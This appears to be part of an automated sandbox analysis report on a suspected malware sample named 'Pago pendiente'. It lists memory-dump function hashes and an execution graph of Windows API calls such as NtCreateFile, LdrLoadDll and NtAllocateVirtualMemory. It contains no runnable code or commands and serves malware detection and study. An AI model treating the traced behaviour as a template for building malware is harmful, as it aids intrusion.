                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5daf667086d8794401af825267b21e3d467d2de360e69ed419c3ce1e992bd15e
                                                          • Instruction ID: 3e77e653ffb702a8809cc95bbdd83d174e8c0b24057aae57f547f09c6b5b10b6
                                                          • Opcode Fuzzy Hash: 5daf667086d8794401af825267b21e3d467d2de360e69ed419c3ce1e992bd15e
                                                          • Instruction Fuzzy Hash: 11C1DDB08227568BD710CF68F98E1897FB1BB85318F51C709E1626B2E4DFB4154AEF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07727678 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9762cd0a40e5ae959fafdb33441cacf4a3c7dba03d5839045720feb6a2e3f864
                                                          • Instruction ID: 4bd61a8f24e4366ba931c5e171db02d6a4ee46ff79081e1b694e09366b956dd0
                                                          • Opcode Fuzzy Hash: 9762cd0a40e5ae959fafdb33441cacf4a3c7dba03d5839045720feb6a2e3f864
                                                          • Instruction Fuzzy Hash: 35811574E1021ACFCB44CFA9C68499EBBF1FF89354F14956AD515AB320D330AA42CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07727688 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78fa769cd633cf6523a825a3f720e4f52347274884ddb8b1d5e16d547c7f2325
                                                          • Instruction ID: b40a96f0419d25a16a06150724431f9db2ae6970a9a4f2dd360c5c0c14608a6f
                                                          • Opcode Fuzzy Hash: 78fa769cd633cf6523a825a3f720e4f52347274884ddb8b1d5e16d547c7f2325
                                                          • Instruction Fuzzy Hash: B981E0B4E1121ACFCB44CFA9C68499EBBF1FF89350F149569D515AB320D330AA42CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07725348 Relevance: .2, Instructions: 171COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab9959d6dc6c99c3a5837bd08aef2f7df84a71363033378d6e3fbcc21950068d
                                                          • Instruction ID: 1a7d82375479f2ccd5341fca7cfca62c9ab8e2ab5ceb2cc3ced0b5d59797bdfe
                                                          • Opcode Fuzzy Hash: ab9959d6dc6c99c3a5837bd08aef2f7df84a71363033378d6e3fbcc21950068d
                                                          • Instruction Fuzzy Hash: AB7146B4E1521ADFCB04CF99D4809AEFBB2FF89350F109466E421AB355C3749A52DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07725345 Relevance: .2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23f89d01db051188bfd7a2ffcea408362d0d9f6b1e18c238cdad3cbd02751197
                                                          • Instruction ID: c5ee1e5dfd8d447aa6df7ac2a35bdb860815d6f638ced5e77c1b6e1331482d1d
                                                          • Opcode Fuzzy Hash: 23f89d01db051188bfd7a2ffcea408362d0d9f6b1e18c238cdad3cbd02751197
                                                          • Instruction Fuzzy Hash: 266147B4E1421ADFCB04CF99D0809AEFBB2FF89350F149466E811AB255D3349A52DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728AE8 Relevance: .2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 091da4d51517f6106c1be168dd264d20b2b076246d5cabb56defb2964ec2cbb0
                                                          • Instruction ID: 56190c707381f6d8efc9bcec6ceeef86177511026dbe94a25c0369659ad16ae0
                                                          • Opcode Fuzzy Hash: 091da4d51517f6106c1be168dd264d20b2b076246d5cabb56defb2964ec2cbb0
                                                          • Instruction Fuzzy Hash: 9A6144B0935659EFCB00CF52F586059BFB1FBCA380F14D4D9D0E49A144DB7A5662C70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728540 Relevance: .2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f3974377b07b1784733e5d150d3f256f2be1fa6194e730aa1ef5c75539401c8
                                                          • Instruction ID: f626d242621bf532528188fb922925aecb843ea3f2691f8c2c5d190ea7233193
                                                          • Opcode Fuzzy Hash: 4f3974377b07b1784733e5d150d3f256f2be1fa6194e730aa1ef5c75539401c8
                                                          • Instruction Fuzzy Hash: B361F5B0E1521ADFCB04CFAAC5815EEFBB2FF49340F14845AD525A7204D3359A829F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07728531 Relevance: .1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dd49d652e77c766bcc9948e298c69344eda2a64872b07dee82569cec4043d87
                                                          • Instruction ID: 113462217bdcb43db0528d8997dcd8e0bf87f0771cdfa2a7079a6b24b8b236d9
                                                          • Opcode Fuzzy Hash: 5dd49d652e77c766bcc9948e298c69344eda2a64872b07dee82569cec4043d87
                                                          • Instruction Fuzzy Hash: 1B5129B1E1421ADFCB04CFAAC5815AEFBB2FF45340F14C426D425A7244D3359A82DF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772A7C0 Relevance: .1, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1185dff62beb8ffad8b65a473bdd02f5f895b3f6b805e023f1b46e50aff8976
                                                          • Instruction ID: 6fe60aec922e42f1c2618a395fe4911d34ad738a5c4b3a409cd29cf4d84a3b3c
                                                          • Opcode Fuzzy Hash: a1185dff62beb8ffad8b65a473bdd02f5f895b3f6b805e023f1b46e50aff8976
                                                          • Instruction Fuzzy Hash: 025159B0E1521A9FCB04CFA6D8455AEFBF2FF89300F20D42AE815B7254EB345A428F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772A7B0 Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b5937dd57f3065ac14fe04baf86ff9ca818e259eafffb76285afdedcfe64165
                                                          • Instruction ID: f469b71d0f95f09af7d6cf540b25b5a600e34d7d1ff30fdd80ac19c4324a0514
                                                          • Opcode Fuzzy Hash: 1b5937dd57f3065ac14fe04baf86ff9ca818e259eafffb76285afdedcfe64165
                                                          • Instruction Fuzzy Hash: B1514AB0E1521A9FCB04CFA6D8455AEFBF2FF89340F24D42AE411B7254EB345A428F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A55688 Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47a3aa8326657474d474b1b2b4c67b832ed5188930a3b402e4a090880b09ab0f
                                                          • Instruction ID: 0da1b19ff91d5e78854cb58a26563a9fe50e71c1c474b2c2609b6a58db78f6f0
                                                          • Opcode Fuzzy Hash: 47a3aa8326657474d474b1b2b4c67b832ed5188930a3b402e4a090880b09ab0f
                                                          • Instruction Fuzzy Hash: 76511DB0E056198FDB14CFA9C5849AEFBF2FF89304F24816AD818A7315D7349941CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077288A3 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17255d7ddaa0427ad5aaf4bffe693f7f740188a5c3a1d4f327fa8d8481040c5b
                                                          • Instruction ID: d4e0e0cc670ecbc4be16d451f5ecafac93e06577f81f92746dac7658c6ff8d8d
                                                          • Opcode Fuzzy Hash: 17255d7ddaa0427ad5aaf4bffe693f7f740188a5c3a1d4f327fa8d8481040c5b
                                                          • Instruction Fuzzy Hash: 944138B0D0021ACFCB04CFAAC4815AEFBF2FF89250F24C06AD565E7214D735A6428F56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077288B0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e273c86cb28fa1067b923a303893e6d576408a8ab01afc02c8713c04f93f322
                                                          • Instruction ID: 4e4709d4a4201a2d96ed6f1b60e9171f1fa10d9c9c7b6dc0a9c150b3db79fa86
                                                          • Opcode Fuzzy Hash: 3e273c86cb28fa1067b923a303893e6d576408a8ab01afc02c8713c04f93f322
                                                          • Instruction Fuzzy Hash: 3F41E7B0D0121ADFCB44CFAAC4815AEFBF2FF89240F24D16AC565B7214D735AA428F55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772DAC8 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T+-q$[V~*$[V~*$]\`
                                                          • API String ID: 0-1849991408
                                                          • Opcode ID: 598118bb9945c9a374f83e464f9e0b753688a82d25dc9a8adf1c1e9ae701e6be
                                                          • Instruction ID: 8bbc978fbac7fe085334133df54044b939bebdbf5ab79d6b1af385c2c51e0df1
                                                          • Opcode Fuzzy Hash: 598118bb9945c9a374f83e464f9e0b753688a82d25dc9a8adf1c1e9ae701e6be
                                                          • Instruction Fuzzy Hash: F22193B1E106598FDB48CFABC94469EFBF3BF89300F14C12AD818AB258DB7459428F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:1.4%
                                                          Dynamic/Decrypted Code Coverage:2.7%
                                                          Signature Coverage:5.8%
                                                          Total number of Nodes:555
                                                          Total number of Limit Nodes:64
                                                          execution_graph 100035 41f0f0 100038 41b970 100035->100038 100039 41b996 100038->100039 100046 409d40 100039->100046 100041 41b9c3 100042 41b9a2 100042->100041 100054 40c1c0 100042->100054 100044 41b9b5 100090 41a6b0 100044->100090 100093 409c90 100046->100093 100048 409d4d 100049 409d54 100048->100049 100105 409c30 100048->100105 100049->100042 100055 40c1e5 100054->100055 100524 40b1c0 100055->100524 100057 40c23c 100528 40ae40 100057->100528 100059 40c262 100089 40c4b3 100059->100089 100537 4143a0 100059->100537 100061 40c2a7 100061->100089 100540 408a60 100061->100540 100063 40c2eb 100063->100089 100547 41a500 100063->100547 100067 40c341 100068 40c348 100067->100068 100559 41a010 100067->100559 100069 41bdc0 2 API calls 100068->100069 100071 40c355 100069->100071 100071->100044 100073 40c392 100074 41bdc0 2 API calls 100073->100074 100075 40c399 100074->100075 100075->100044 100076 40c3a2 100077 40f4a0 3 API calls 100076->100077 100078 40c416 100077->100078 100078->100068 100079 40c421 100078->100079 100080 41bdc0 2 API calls 100079->100080 100081 40c445 100080->100081 100564 41a060 100081->100564 100084 41a010 2 API calls 100085 40c480 100084->100085 100085->100089 100569 419e20 100085->100569 100088 41a6b0 2 API calls 100088->100089 100089->100044 100091 41af60 LdrLoadDll 100090->100091 100092 41a6cf ExitProcess 100091->100092 100092->100041 100124 418bc0 100093->100124 100097 409cb6 100097->100048 100098 409cac 100098->100097 100131 41b2b0 100098->100131 100100 409cf3 100100->100097 100142 409ab0 100100->100142 100102 409d13 100148 409620 LdrLoadDll 100102->100148 100104 409d25 100104->100048 100106 409c4a 100105->100106 100107 41b5a0 LdrLoadDll 100105->100107 100499 41b5a0 100106->100499 100107->100106 100110 41b5a0 LdrLoadDll 100111 409c71 100110->100111 100112 40f180 100111->100112 100113 40f199 100112->100113 100507 40b040 100113->100507 100115 40f1ac 100511 41a1e0 100115->100511 100119 40f1d2 100122 40f1fd 100119->100122 100517 41a260 100119->100517 100121 41a490 2 API calls 100123 409d65 100121->100123 100122->100121 100123->100042 100125 418bcf 100124->100125 100149 414e50 100125->100149 100127 409ca3 100128 418a70 100127->100128 100155 41a600 100128->100155 100132 41b2c9 100131->100132 100162 414a50 100132->100162 100134 41b2e1 100135 41b2ea 100134->100135 100201 41b0f0 100134->100201 100135->100100 100137 41b2fe 100137->100135 100219 419f00 100137->100219 100145 409aca 100142->100145 100477 407ea0 100142->100477 100144 409ad1 100144->100102 100145->100144 100490 408160 100145->100490 100148->100104 100150 414e5e 100149->100150 100151 414e6a 100149->100151 100150->100151 100154 4152d0 LdrLoadDll 100150->100154 100151->100127 100153 414fbc 100153->100127 100154->100153 100158 41af60 100155->100158 100157 418a85 100157->100098 100159 41af70 100158->100159 100160 41af92 100158->100160 100161 414e50 LdrLoadDll 100159->100161 100160->100157 100161->100160 100163 414d85 100162->100163 100173 414a64 100162->100173 100163->100134 100166 414b90 100230 41a360 100166->100230 100167 414b73 100287 41a460 LdrLoadDll 100167->100287 100170 414bb7 100172 41bdc0 2 API calls 100170->100172 100171 414b7d 100171->100134 100174 414bc3 100172->100174 100173->100163 100227 419c50 100173->100227 100174->100171 100175 414d49 100174->100175 100177 414d5f 100174->100177 100181 414c52 100174->100181 100176 41a490 2 API calls 100175->100176 100178 414d50 100176->100178 100296 414790 LdrLoadDll NtReadFile NtClose 100177->100296 100178->100134 100180 414d72 100180->100134 100182 414cb9 100181->100182 100184 414c61 100181->100184 100182->100175 100183 414ccc 100182->100183 100289 41a2e0 100183->100289 100186 414c66 100184->100186 100187 414c7a 100184->100187 100288 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 100186->100288 100188 414c97 100187->100188 100189 414c7f 100187->100189 100188->100178 100245 414410 100188->100245 100233 4146f0 100189->100233 100194 414c70 100194->100134 100195 414c8d 100195->100134 100197 414d2c 100293 41a490 100197->100293 100198 414caf 100198->100134 100200 414d38 100200->100134 100202 41b101 100201->100202 100203 41b113 100202->100203 100314 41bd40 100202->100314 100203->100137 100205 41b134 100208 41b157 100205->100208 100317 414070 100205->100317 100207 41b180 100207->100137 100208->100207 100209 414070 3 API calls 100208->100209 100212 41b179 100209->100212 100211 41b20a 100213 41b21a 100211->100213 100443 41af00 LdrLoadDll 100211->100443 100212->100207 100349 415390 100212->100349 100359 41ad70 100213->100359 100216 41b248 100438 419ec0 100216->100438 100220 41af60 LdrLoadDll 100219->100220 100221 419f1c 100220->100221 100471 1472c0a 100221->100471 100222 419f37 100224 41bdc0 100222->100224 100474 41a670 100224->100474 100226 41b359 100226->100100 100228 41af60 LdrLoadDll 100227->100228 100229 414b44 100228->100229 100229->100166 100229->100167 100229->100171 100231 41a37c NtCreateFile 100230->100231 100232 41af60 LdrLoadDll 100230->100232 100231->100170 100232->100231 100234 41470c 100233->100234 100235 41a2e0 LdrLoadDll 100234->100235 100236 41472d 100235->100236 100237 414734 100236->100237 100238 414748 100236->100238 100239 41a490 2 API calls 100237->100239 100240 41a490 2 API calls 100238->100240 100241 41473d 100239->100241 100242 414751 100240->100242 100241->100195 100297 41bfd0 LdrLoadDll RtlAllocateHeap 100242->100297 100244 41475c 100244->100195 100246 41445b 100245->100246 100247 41448e 100245->100247 100249 41a2e0 LdrLoadDll 100246->100249 100248 4145d9 100247->100248 100253 4144aa 100247->100253 100251 41a2e0 LdrLoadDll 100248->100251 100250 414476 100249->100250 100252 41a490 2 API calls 100250->100252 100256 4145f4 100251->100256 100254 41447f 100252->100254 100255 41a2e0 LdrLoadDll 100253->100255 100254->100198 100257 4144c5 100255->100257 100310 41a320 LdrLoadDll 100256->100310 100259 4144e1 100257->100259 100260 4144cc 100257->100260 100263 4144e6 100259->100263 100264 4144fc 100259->100264 100262 41a490 2 API calls 100260->100262 100261 41462e 100265 41a490 2 API calls 100261->100265 100266 4144d5 100262->100266 100267 41a490 2 API calls 100263->100267 100272 414501 100264->100272 100298 41bf90 100264->100298 100268 414639 100265->100268 100266->100198 100269 4144ef 100267->100269 100268->100198 100269->100198 100280 414513 100272->100280 100301 41a410 100272->100301 100273 414567 100274 41457e 100273->100274 100309 41a2a0 LdrLoadDll 100273->100309 100276 414585 100274->100276 100277 41459a 100274->100277 100278 41a490 2 API calls 100276->100278 100279 41a490 2 API calls 100277->100279 100278->100280 100281 4145a3 100279->100281 100280->100198 100282 4145cf 100281->100282 100304 41bb90 100281->100304 100282->100198 100284 4145ba 100285 41bdc0 2 API calls 100284->100285 100286 4145c3 100285->100286 100286->100198 100287->100171 100288->100194 100290 41af60 LdrLoadDll 100289->100290 100291 414d14 100290->100291 100292 41a320 LdrLoadDll 100291->100292 100292->100197 100294 41af60 LdrLoadDll 100293->100294 100295 41a4ac NtClose 100294->100295 100295->100200 100296->100180 100297->100244 100311 41a630 100298->100311 100300 41bfa8 100300->100272 100302 41af60 LdrLoadDll 100301->100302 100303 41a42c NtReadFile 100302->100303 100303->100273 100305 41bbb4 100304->100305 100306 41bb9d 100304->100306 100305->100284 100306->100305 100307 41bf90 2 API calls 100306->100307 100308 41bbcb 100307->100308 100308->100284 100309->100274 100310->100261 100312 41af60 LdrLoadDll 100311->100312 100313 41a64c RtlAllocateHeap 100312->100313 100313->100300 100444 41a540 100314->100444 100316 41bd6d 100316->100205 100318 414081 100317->100318 100319 414089 100317->100319 100318->100208 100348 41435c 100319->100348 100447 41cf30 100319->100447 100321 4140dd 100322 41cf30 2 API calls 100321->100322 100325 4140e8 100322->100325 100323 414136 100326 41cf30 2 API calls 100323->100326 100325->100323 100327 41d060 3 API calls 100325->100327 100458 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 100325->100458 100329 41414a 100326->100329 100327->100325 100328 4141a7 100330 41cf30 2 API calls 100328->100330 100329->100328 100452 41d060 100329->100452 100331 4141bd 100330->100331 100333 4141fa 100331->100333 100335 41d060 3 API calls 100331->100335 100334 41cf30 2 API calls 100333->100334 100337 414205 100334->100337 100335->100331 100336 41d060 3 API calls 100336->100337 100337->100336 100343 41423f 100337->100343 100339 414334 100460 41cf90 LdrLoadDll RtlFreeHeap 100339->100460 100341 41433e 100461 41cf90 LdrLoadDll RtlFreeHeap 100341->100461 100459 41cf90 LdrLoadDll RtlFreeHeap 100343->100459 100344 414348 100462 41cf90 LdrLoadDll RtlFreeHeap 100344->100462 100346 414352 100463 41cf90 LdrLoadDll RtlFreeHeap 100346->100463 100348->100208 100350 4153a1 100349->100350 100351 414a50 8 API calls 100350->100351 100353 4153b7 100351->100353 100352 41540a 100352->100211 100353->100352 100354 4153f2 100353->100354 100355 415405 100353->100355 100356 41bdc0 2 API calls 100354->100356 100357 41bdc0 2 API calls 100355->100357 100358 4153f7 100356->100358 100357->100352 100358->100211 100360 41ad84 100359->100360 100361 41ac30 LdrLoadDll 100359->100361 100464 41ac30 100360->100464 100361->100360 100364 41ac30 LdrLoadDll 100365 41ad96 100364->100365 100366 41ac30 LdrLoadDll 100365->100366 100367 41ad9f 100366->100367 100368 41ac30 LdrLoadDll 100367->100368 100369 41ada8 100368->100369 100370 41ac30 LdrLoadDll 100369->100370 100371 41adb1 100370->100371 100372 41ac30 LdrLoadDll 100371->100372 100373 41adbd 100372->100373 100374 41ac30 LdrLoadDll 100373->100374 100375 41adc6 100374->100375 100376 41ac30 LdrLoadDll 100375->100376 100377 41adcf 100376->100377 100378 41ac30 LdrLoadDll 100377->100378 100379 41add8 100378->100379 100380 41ac30 LdrLoadDll 100379->100380 100381 41ade1 100380->100381 100382 41ac30 LdrLoadDll 100381->100382 100383 41adea 100382->100383 100384 41ac30 LdrLoadDll 100383->100384 100385 41adf6 100384->100385 100386 41ac30 LdrLoadDll 100385->100386 100387 41adff 100386->100387 100388 41ac30 LdrLoadDll 100387->100388 100389 41ae08 100388->100389 100390 41ac30 LdrLoadDll 100389->100390 100391 41ae11 100390->100391 100392 41ac30 LdrLoadDll 100391->100392 100393 41ae1a 100392->100393 100394 41ac30 LdrLoadDll 100393->100394 100395 41ae23 100394->100395 100396 41ac30 LdrLoadDll 100395->100396 100397 41ae2f 100396->100397 100398 41ac30 LdrLoadDll 100397->100398 100399 41ae38 100398->100399 100400 41ac30 LdrLoadDll 100399->100400 100401 41ae41 100400->100401 100402 41ac30 LdrLoadDll 100401->100402 100403 41ae4a 100402->100403 100404 41ac30 LdrLoadDll 100403->100404 100405 41ae53 100404->100405 100406 41ac30 LdrLoadDll 100405->100406 100407 41ae5c 100406->100407 100408 41ac30 LdrLoadDll 100407->100408 100409 41ae68 100408->100409 100410 41ac30 LdrLoadDll 100409->100410 100411 41ae71 100410->100411 100412 41ac30 LdrLoadDll 100411->100412 100413 41ae7a 100412->100413 100414 41ac30 LdrLoadDll 100413->100414 100415 41ae83 100414->100415 100416 41ac30 LdrLoadDll 100415->100416 100417 41ae8c 100416->100417 100418 41ac30 LdrLoadDll 100417->100418 100419 41ae95 100418->100419 100420 41ac30 LdrLoadDll 100419->100420 100421 41aea1 100420->100421 100422 41ac30 LdrLoadDll 100421->100422 100423 41aeaa 100422->100423 100424 41ac30 LdrLoadDll 100423->100424 100425 41aeb3 100424->100425 100426 41ac30 LdrLoadDll 100425->100426 100427 41aebc 100426->100427 100428 41ac30 LdrLoadDll 100427->100428 100429 41aec5 100428->100429 100430 41ac30 LdrLoadDll 100429->100430 100431 41aece 100430->100431 100432 41ac30 LdrLoadDll 100431->100432 100433 41aeda 100432->100433 100434 41ac30 LdrLoadDll 100433->100434 100435 41aee3 100434->100435 100436 41ac30 LdrLoadDll 100435->100436 100437 41aeec 100436->100437 100437->100216 100439 41af60 LdrLoadDll 100438->100439 100440 419edc 100439->100440 100470 1472df0 LdrInitializeThunk 100440->100470 100441 419ef3 100441->100137 100443->100213 100445 41af60 LdrLoadDll 100444->100445 100446 41a55c NtAllocateVirtualMemory 100445->100446 100446->100316 100448 41cf40 100447->100448 100449 41cf46 100447->100449 100448->100321 100450 41bf90 2 API calls 100449->100450 100451 41cf6c 100450->100451 100451->100321 100453 41cfd0 100452->100453 100454 41d02d 100453->100454 100455 41bf90 2 API calls 100453->100455 100454->100329 100456 41d00a 100455->100456 100457 41bdc0 2 API calls 100456->100457 100457->100454 100458->100325 100459->100339 100460->100341 100461->100344 100462->100346 100463->100348 100465 41ac4b 100464->100465 100466 414e50 LdrLoadDll 100465->100466 100467 41ac6b 100466->100467 100468 414e50 LdrLoadDll 100467->100468 100469 41ad17 100467->100469 100468->100469 100469->100364 100470->100441 100472 1472c11 100471->100472 100473 1472c1f LdrInitializeThunk 100471->100473 100472->100222 100473->100222 100475 41af60 LdrLoadDll 100474->100475 100476 41a68c RtlFreeHeap 100475->100476 100476->100226 100478 407eb0 100477->100478 100479 407eab 100477->100479 100480 41bd40 2 API calls 100478->100480 100479->100145 100483 407ed5 100480->100483 100481 407f38 100481->100145 100482 419ec0 2 API calls 100482->100483 100483->100481 100483->100482 100484 407f3e 100483->100484 100488 41bd40 2 API calls 100483->100488 100493 41a5c0 100483->100493 100486 407f64 100484->100486 100487 41a5c0 2 API calls 100484->100487 100486->100145 100489 407f55 100487->100489 100488->100483 100489->100145 100491 41a5c0 2 API calls 100490->100491 100492 40817e 100491->100492 100492->100102 100494 41af60 LdrLoadDll 100493->100494 100495 41a5dc 100494->100495 100498 1472c70 LdrInitializeThunk 100495->100498 100496 41a5f3 100496->100483 100498->100496 100500 41b5c3 100499->100500 100503 40acf0 100500->100503 100504 40ad14 100503->100504 100505 409c5b 100504->100505 100506 40ad50 LdrLoadDll 100504->100506 100505->100110 100506->100505 100509 40b063 100507->100509 100508 40b0e0 100508->100115 100509->100508 100522 419c90 LdrLoadDll 100509->100522 100512 41af60 LdrLoadDll 100511->100512 100513 40f1bb 100512->100513 100513->100123 100514 41a7d0 100513->100514 100515 41af60 LdrLoadDll 100514->100515 100516 41a7ef LookupPrivilegeValueW 100515->100516 100516->100119 100518 41af60 LdrLoadDll 100517->100518 100519 41a27c 100518->100519 100523 1472ea0 LdrInitializeThunk 100519->100523 100520 41a29b 100520->100122 100522->100508 100523->100520 100525 40b1f0 100524->100525 100526 40b040 LdrLoadDll 100525->100526 100527 40b204 100526->100527 100527->100057 100529 40ae51 100528->100529 100530 40ae4d 100528->100530 100531 40ae6a 100529->100531 100532 40ae9c 100529->100532 100530->100059 100575 419cd0 LdrLoadDll 100531->100575 100576 419cd0 LdrLoadDll 100532->100576 100534 40aead 100534->100059 100536 40ae8c 100536->100059 100538 40f4a0 3 API calls 100537->100538 100539 4143c6 100537->100539 100538->100539 100539->100061 100577 4087a0 100540->100577 100543 4087a0 19 API calls 100544 408a8a 100543->100544 100546 408a9d 100544->100546 100595 40f710 10 API calls 100544->100595 100546->100063 100548 41af60 LdrLoadDll 100547->100548 100549 41a51c 100548->100549 100714 1472e80 LdrInitializeThunk 100549->100714 100550 40c322 100552 40f4a0 100550->100552 100553 40f4bd 100552->100553 100715 419fc0 100553->100715 100556 40f505 100556->100067 100557 41a010 2 API calls 100558 40f52e 100557->100558 100558->100067 100560 41af60 LdrLoadDll 100559->100560 100561 41a02c 100560->100561 100721 1472d10 LdrInitializeThunk 100561->100721 100562 40c385 100562->100073 100562->100076 100565 41af60 LdrLoadDll 100564->100565 100566 41a07c 100565->100566 100722 1472d30 LdrInitializeThunk 100566->100722 100567 40c459 100567->100084 100570 419e35 100569->100570 100571 41af60 LdrLoadDll 100570->100571 100572 419e3c 100571->100572 100723 1472fb0 LdrInitializeThunk 100572->100723 100573 40c4ac 100573->100088 100575->100536 100576->100534 100578 407ea0 4 API calls 100577->100578 100593 4087ba 100578->100593 100579 408a49 100579->100543 100579->100546 100580 408a3f 100581 408160 2 API calls 100580->100581 100581->100579 100584 419f00 2 API calls 100584->100593 100586 41a490 LdrLoadDll NtClose 100586->100593 100589 40c4c0 LdrLoadDll 